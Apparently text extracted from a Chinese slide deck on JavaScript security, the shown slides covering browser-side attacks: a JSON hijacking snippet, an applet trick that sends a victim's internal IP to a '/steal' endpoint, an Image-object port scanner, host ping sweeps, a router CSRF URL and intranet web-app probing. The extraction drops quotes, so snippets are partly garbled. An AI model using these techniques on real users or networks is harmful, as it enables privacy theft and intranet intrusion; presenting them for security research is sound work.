JavaScript安全从浏览器到服务端讲义.ppt

* Thank you! * JavaScript安全从浏览器到服务端 关于我 知道创宇研究部总监 负责和Web安全相关超酷的研究与实现，团队微博： @知道创宇安全研究团队 @知道创宇数据中心 root@xeyeteam, web hacking. JavaScript 浏览器上的战场 MongoDB上的战场 node.js上的战场 ... 战场有多大，我就能玩多大 浏览器上的战场 基本隐私收集 内网浅渗透 突破浏览器边界 XSS Virus攻击 大规模攻击 ... 基本隐私收集 开源的xssprobe /evilcos/xssprobe 获取如下隐私： browser, ua, lang, referer, location, toplocation, cookie, domain, title, screen, flash 基本隐私收集 JSON Hijacking，我知道你是谁 JSON太方便了，前端工程师们非常喜欢用 JSON很容易被劫持： script function func(o){ document.write(i know who u r: +o.userinfo.userid); } /script script src=/xxx.php?callback=func/script 内网浅渗透 内网IP获取 内网IP端口获取 内网主机存活获取 路由Web控制台操作 内网脆弱Web应用控制 内网IP获取 原理：通过Java Applet 需要JRE支持，你们都有:) http://reglos.de/myaddress/MyAddress.html script function MyAddress(ip){ new Image().src = /steal?info=+ipdate=+new Date().getTime()); }; /script APPLET CODE=MyAddress.class MAYSCRIPT WIDTH=0 HEIGHT=0/APPLET 内网IP端口获取 原理： Image对象请求时，得到资源（非法）就onerror，得不到就进入timeout了。别和nmap比:( var m = new Image(); m.onerror = function(){ if (!m) return; m = undefined; alert(open);}; m.onload = m.onerror; m.src=http://+host+:+port; setTimeout(function () { if (!m) return; m = undefined; alert(close); }, 900); 内网主机存活获取 原理： IE下XDomainRequest跨域请求 onerror - fail ontimeout - ok 其它浏览器XMLHttpRequest跨域请求 onreadystatechange - 时间差来判断，timeout则fail 资源在这： /weird/xhr-ping-sweep.html /security/ie8xdr/ie8xdr-ping-sweep.html 可以和nmap比比:) 路由Web控制台操作 img简单CSRF修改各种配置，如：迅捷FW300R 前提：目标的浏览器保存了Web控制台会话 配置可远程访问 /userRpm/ManageControlRpm.htm?port=80ip=55Save=%C8%B7+%B6%A8 修改无线密码、恢复出厂设置、修改转发规则等 还有没有更多的？ 内网脆弱Web应用控制 主动：fuzzing内网可能存在的Web应用 window.onerror=function(){return true;}; inject script script src=http://intra/trac/chrome/tracwysiwyg/wysiwyg.js script window.onload = function(){ if(typeof(TracWysiwyg)==function) alert(trac exist.); }/script ... 被动：通过referer泄露内网Web应用信息 内网脆弱Web应用控制 这些内网应用可能有： bbs/blog/trac/wiki/oa/mail/project/webim/web_vuls_vm 有开源有闭源的 这些Web应用有不同种类的漏洞，如果是xss+sql： xss inject攻击脚本 攻击脚本ajax请求sql注入，得到想要的数据，返回 还有没有更多？ 突破浏览器边界 突破边界，信任危机出现